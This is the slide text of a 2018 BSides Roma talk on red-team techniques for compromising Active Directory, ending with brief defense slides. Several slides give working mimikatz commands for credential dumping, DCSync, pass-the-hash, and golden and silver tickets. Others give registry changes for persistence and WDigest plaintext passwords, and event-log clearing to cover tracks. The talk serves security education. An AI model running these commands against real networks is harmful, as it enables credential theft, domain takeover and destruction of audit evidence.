Successfully reported this slideshow.
We use your LinkedIn profile and activity data to personalize ads and to show you more relevant ads. You can change your ad preferences anytime.

BSides Roma 2018 - Red team techniques

1,734 views

Published on

My talk at BSides Roma 2018

Published in: Technology
  • Be the first to comment

BSides Roma 2018 - Red team techniques

  1. 1. Red Team Techniques or how to expand your Empire in Active Directory Environment Guglielmo Scaiola MCT – MCSE – CEI – CEH – CHFI – ECSA – GPEN - ISO 27001 L.A. – Security + mail: gs@miproparma.com Twitter: @S0ftwarGS Blog: S0ftwarGS.com
  2. 2. Who am I? • Security Consultant e Ethical Hacker • Red Teamer e Penetration Tester • Microsoft System Engineer – A.D. expert • Incident Handling & Enterprise Forensics • Trainer & Speaker Guglielmo «S0ftwar» Scaiola MCT – MCSE – CEI – CEH – CHFI – ECSA - GPEN - ISO 27001 L.A. – Security + mail: gs@miproparma.com Twitter: @S0ftwarGS Blog: S0ftwarGS.com
  3. 3. AGENDA • Intro • Red Team Vs. Blue Team • Red Teaming Infrastructure • Play the Game • Defense • Q & A
  4. 4. Red Teaming: my view • What is for me? – Adversary Emulation – Custom Exploit Dev
  5. 5. Red Team Vs. Blue Team Red Team & Blue Team Collaboration
  6. 6. Red Teaming Infrastructure https://posts.specterops.io/designing-effective-covert-red-team-attack-infrastructure-767d4289af43
  7. 7. Are you saying me that exist one tool for automating all of this????
  8. 8. My name is : ...CobaltStrike
  9. 9. Red Team Attack Chain • Gain Access – Spear Phishing [Malware (trojan...) / Client Side Exploit] • Gain Situational Awareness – Powershell/admin tools & commands • Escalation – Local User/Domain User Local Admin with UAC/Domain User – Local Admin with UAC/Domain User Local Admin Bypass UAC/Domain User – Local Admin Bypass UAC/Domain User Domain Admin • Explore Network & Lateral Movement (loop To Situational Awareness) • Persistence – Backdoor • Access & Egress Data • Extraction
  10. 10. OSINT – (pre – Attack)
  11. 11. Malware Vs. Client Side Exploit Malware Pro • S.O. Agnostic • Arch Agnostic Cons • File Client Side Exploit Pro • Fileless (sure???) • In-memory Cons • Specific for SO/app version
  12. 12. ByPass AV - ByPass Proxy
  13. 13. URL filtering Vs. Domain Fronting https://www.bamsoftware.com/papers/fronting/ https://github.com/rvrsh3ll/FindFrontableDomains https://www.youtube.com/watch?v=IKO1ovl7Ky4&t=6s
  14. 14. Gain Situational Awareness
  15. 15. BloodHound
  16. 16. Priv Escalation Ms16-032 https://github.com/FuzzySecurity/PowerShell-Suite/blob/master/Invoke-MS16-032.ps1
  17. 17. Bypass UAC https://github.com/hfiref0x/UACME
  18. 18. DEMO TIME
  19. 19. Abuse Terminal Server Session
  20. 20. Ms14-068 kekeo https://github.com/gentilkiwi/kekeo/releases
  21. 21. Dump plaintext password
  22. 22. Dump plaintext password???
  23. 23. Back to the future https://www.trustedsec.com/2015/04/dumping-wdigest-creds-with-meterpreter-mimikatzkiwi-in-windows-8-1/ reg add HKLMSYSTEMCurrentControlSetControlSecurityProvidersWDigest /v UseLogonCredential /t REG_DWORD /d 1
  24. 24. Dump local Hash DB lsadump::lsa /inject /name:krbtgt lsadump::lsa lsadump::lsa /patch
  25. 25. 25 DSRM Password https://technet.microsoft.com/en-us/library/cc732714(v=ws.10).aspx HKLMSystemCurrentControlSetControlLsaDSRMAdminLogonBehavior
  26. 26. DCSync DCSync: 1) Discovery DC 2) Query replicate the user cred via GetNCChange Lsadump::dcsync /domain:child1.newtest.lab /user:child1krbtgt
  27. 27. Mimikatz – over-pass-the-hash sekurlsa::pth /user:admin2 /domain:child1.newtest.lab /ntlm:a87f3a337d73085c45f9416be5787d86
  28. 28. Silver ticket Is a TGS: no communication with the DC , but the account computer password is changing every 30 days HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesNetlogonParametersDisablePasswordChange = 1 kerberos::golden /admin:fakeuser /id:666666 /domain:child1.newtest.lab /sid:S-1-5-21-1286882215-52109606- 1499245918 /target:dc012k12r2.child1.newtest.lab /rc4:84dc6e3f0de5d9788da6529b4f79b2c6 /service:cifs /ptt ON DC : HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesNetlogonParametersRefusePasswordChange = 1 HKLMSYSTEMCurrentControlSetServicesNetLogonParametersMaximumPasswordAge
  29. 29. Mimikatz – Golden Ticket kerberos::golden /admin:fakeuser /id:666666 /domain:child1.newtest.lab /sid:S-1-5-21-1286882215-52109606- 1499245918 /target:dc012k12r2.child1.newtest.lab /rc4:84dc6e3f0de5d9788da6529b4f79b2c6 /ptt
  30. 30. 519: Active Directory Persistence con SID History kerberos::golden /admin:fakeuser /id:666666 /domain:child1.newtest.lab /sid:S-1-5-21-1286882215-52109606-1499245918 /target:dc012k12r2.child1.newtest.lab /rc4:84dc6e3f0de5d9788da6529b4f79b2c6 /groups:513,512,520,518 /sids: S-1-5-21-655507452- 925574031-147420587-519 /ptt
  31. 31. Skeleton key 31
  32. 32. Malicious Security Provider HKLMSystemCurrentControlSetControlLsaSecurity Packages
  33. 33. AdminSDHolder
  34. 34. AdminSDHolder
  35. 35. Process Doppelgänging – a new way to impersonate a process
  36. 36. Clearing Track with Mimikatz 2.1.1 20171220 • event::drop • event::clear
  37. 37. Powershell without powershell – bypass Device Guard
  38. 38. ByPass W10 security enhancement • AMSI • Autologging • Windows Defender SmartScreen • Device Guard • Windows Defender Antivirus • Credential Guard • Device Guard
  39. 39. LAPS - Local Administrator Password Solution https://technet.microsoft.com/en-us/mt227395.aspx
  40. 40. LAPS - Get-AdmPwdPassword
  41. 41. The winner is….ATA
  42. 42. Some ATA Bypass Techniques ATA can’t win if: • The protocols are correctly implemented • ATA can’t see how the ticket (or request) are built • ATA can’t see the traffic with his agents
  43. 43. Bypass 1 - OverPassTheHash sekurlsa::pth /user:MyUser /domain:MyDomain /aes256:aes256 /ntlm:ntlm /aes128:aes128"‘ sekurlsa::pth /user:admin2 /domain:child1.newtest.lab /ntlm:92937945b518814341de3f726500d4ff /aes256:cc057a204bb4aad41694a58f495b0834118599d76c7a66b0326cb250a9c46f8f /aes128:d4a5dd3dce09a0e031c114fdd7e8094c
  44. 44. Bypass 2 – Golden Ticket kerberos::golden /User:MyUser /domain:MyDomain /sid:S-1-5-21-3270384115-3177237293-604223748 /aes256:aes256krbtgt /id:1000 /groups:512,513,518,520 /ptt"‘ Golden with AES keys can be generated from any machine unlike restrictions in case of Over-PTH.
  45. 45. WPC2017 45
  46. 46. DEMO TIME
  47. 47. We must never arrive at "certain conditions"! Under certain conditions every security countermeasure can by bypassed ... So?
  48. 48. Defense in depth
  49. 49. SIEM, logging e Threat Intelligence
  50. 50. Q & A
  51. 51. Credits • SpecterOps:@SpecterOps – Matt Graeber: @mattifestation – Will Schroeder: @harmj0y – Raphael Mudge: @ArmitageHacker – Andrew Robbins: @_wald0 – Matt Nelson: @Enigma0x3 • Benjamin Delphi: @gentilkiwi • Sean Metcalf: @PyroTek3

×